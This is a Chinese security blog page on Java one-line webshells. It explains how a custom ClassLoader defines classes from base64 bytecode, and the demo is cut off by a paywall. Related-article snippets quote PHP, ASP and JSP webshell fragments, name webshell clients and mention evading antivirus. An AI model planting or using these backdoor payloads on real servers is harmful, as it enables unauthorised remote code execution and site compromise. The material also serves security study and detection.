安全技术系列之Java一句话木马

原创 已于 2022-03-13 20:34:37 修改 · 4.7k 阅读 · 1
标签
#Java #一句话木马
于 2021-10-14 17:45:31 首次发布
本文介绍了Java一句话木马的原理,包括利用自定义ClassLoader或反射机制动态解析Class字节流的方法。通过定义子类调用defineClass方法,或者使用反射,可以实现动态执行Java代码。

0x01 原理介绍

首先要让服务端有动态地将字节流解析成Class的能力,这是基础。
正常情况下,Java并没有提供直接解析class字节数组的接口。不过classloader内部实现了一个protected的defineClass方法,可以将byte[]直接转换为Class,方法原型如下:
在这里插入图片描述
因为该方法是protected的,我们没办法在外部直接调用,当然我们可以通过反射来修改保护属性,不过我们选择一个更方便的方法,直接自定义一个类继承classloader,然后在子类中调用父类的defineClass方法。

下面是一个简单的Demo:

public class Demo {
   
   
    
    public static class Myloader extends ClassLoader {
   
   
        public Class get(byte[] b) {
   
   
            return super.defineClass(b, 0, b.length);
        }
    }

    // 使用继承ClassLoader的方法
    public static Class<?> getClass(String classCode) throws IOException, InstantiationException, IllegalAccessException {
   
   
        BASE64Decoder code = new BASE64Decoder();
        Class result = new Myloader().get(code.decodeBuffer(classCode)
最低0.47元/天 解锁文章
文件上传漏洞------句话木马原理解析
m0_69151365的博客
03-11 3967
这是个最简单的句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
java 句话木马
weixin_42611177的博客
01-11 892
Java 句话木马种在 Java 环境中执行恶意代码的攻击方式。通常,攻击者会在Java 代码中插入恶意代码,并将其嵌入到 Java 类文件中。当用户下载并运行该 Java 类文件时,恶意代码就会被执行,从而对用户计算机造成威胁。 ...
java安全——jsp句话木马
m0_46317063的博客
01-31 1万+
java句话木马
java句话木马_如何使用JSP句话木马和菜刀木马
weixin_39782545的博客
02-16 4718
展开全部相信用过句话木马的黑阔们对中国32313133353236313431303231363533e4b893e5b19e31333337393033菜刀这个程序不会感到陌生,小弟也曾使用PHP句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使...
java 菜刀_jsp句话木马菜刀
weixin_30341121的博客
02-20 6646
1.如何使用JSP句话木马和菜刀木马相信用过句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许场血雨...
手把手简单制作Java 木马程序
xmt1139057136的专栏
08-01 7613
你知道的越多,不知道的就越多,业余的像棵小草!你来,我们起精进!你不来,我和你的竞争对手起精进!编辑:业余草juejin.cn/post/6990715558178062372推荐:...
java句话木马_各种句话木马大全
weixin_32365089的博客
02-16 5147
%>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>'备份专用'无防下载表,有防下载表突破专用句话'防杀防扫专用"" ThenExecuteGlobal(Request("c"))%>'不用""execute request("c")名字)+...
句话木马该怎么实现?现在就带你了解
kali_Ma的博客
07-30 6014
前言 直以来,Java句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出Java句话木马:利用Java中JS引擎实现的句话木马。 基本原理 Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 Java从1.6开始自带ScriptEng
java 木马开发(1)
zkwniky的博客
01-15 5431
曾经研究过段时间的逆向、破解、木马病毒之类的,很多人说,Java不能写木马,当时气不过,就写了个简单的木马。最近段时间有些闲,整理些以前的代码,也是个学习的过程。 现在将木马运行的效果贴下,在以后的过程中,回分几部分将代码讲解清楚贴出来,希望大家多提宝贵意见。 服务端每隔5秒钟运行次监听 =================================
Webshell和句话木马
热门推荐
谢公子的博客
11-28 2万+
目录 Webshell(大) 句话木马(小) 句话木马原理 句话木马的变形 JSP后门脚本 Webshell(大) 我们经常会看到Webshell,那么,到底什么是Webshell呢? webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的种命令执行环境,也可以将其称做为种网页后门。黑客在入侵了个网站后,通常会将asp、aspx...
jsp句话木马
ditanji3425的博客
05-08 1406
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> <%!String Pwd = "pass"; String EC(String s, String c) throws Exception { return s; }//n...
php句话木马_记次对“冰蝎”句话木马流量的分析
weixin_39905816的博客
12-19 1131
预备知识“冰蝎”php句话木马分析“冰蝎”是什么?它是款动态二进制加密网站管理客户端,它可以在HTTP明文协议中建立加密隧道,可以用于躲避传统的WAF、IDS等设备的检测。项目地址:https://github.com/rebeyond/Behinder“冰蝎”句话木马可由Java、php、.net等语言来实现,我们以php为例来看这种新型的php句话木马的实现:...
【开源】基于JAVA语言的木马文件检测系统
askf01的博客
12-06 1474
基于JAVA+Vue+SpringBoot+MySQL的木马文件检测系统,包含了木马类型、木马软件档案、安全资讯、软件脆弱点、软件检测模块,还包含系统自带的用户管理、部门管理、角色管理、菜单管理、日志管理、数据字典管理、文件管理、图表展示等基础模块,木马文件检测系统基于角色的访问控制,给软件管理员、普通用户使用,可将权限精确到按钮级别,您可以自定义角色并分配权限,系统适合设计精确的权限约束需求。
【开源】基于JAVA木马文件检测系统
as230627的博客
12-08 1019
基于JAVA+Vue+SpringBoot+MySQL的木马文件检测系统,包含了木马类型、木马软件档案、安全资讯、软件脆弱点、软件检测模块,还包含系统自带的用户管理、部门管理、角色管理、菜单管理、日志管理、数据字典管理、文件管理、图表展示等基础模块,木马文件检测系统基于角色的访问控制,给软件管理员、普通用户使用,可将权限精确到按钮级别,您可以自定义角色并分配权限,系统适合设计精确的权限约束需求。
java 简单的webshell_句话木马的简单例子 网站webshell & 远程连接
weixin_30706851的博客
02-26 1164
概述本地 kail linux目标 windows nt 服务器二 过程首先编写句话木马 index.php句话木马的原理就是把C=xxx 字符串当成php语句执行注意这里用了GET,因为尝试过POST不成功编写 上传脚本 index.pyimportrequestsbase_url='http://192.168.1.4/'url_for_time='index.php?modul...
上传漏洞-句话木马
Coisini的博客
05-30 9006
声明:为什么又写篇关于句话木马,对,我第次没写明白,直写了句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改下,这次精写! 上传漏洞-句话木马 讲述内容: 句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 句话木马 句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入句话木马,然后你就可以在本地通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值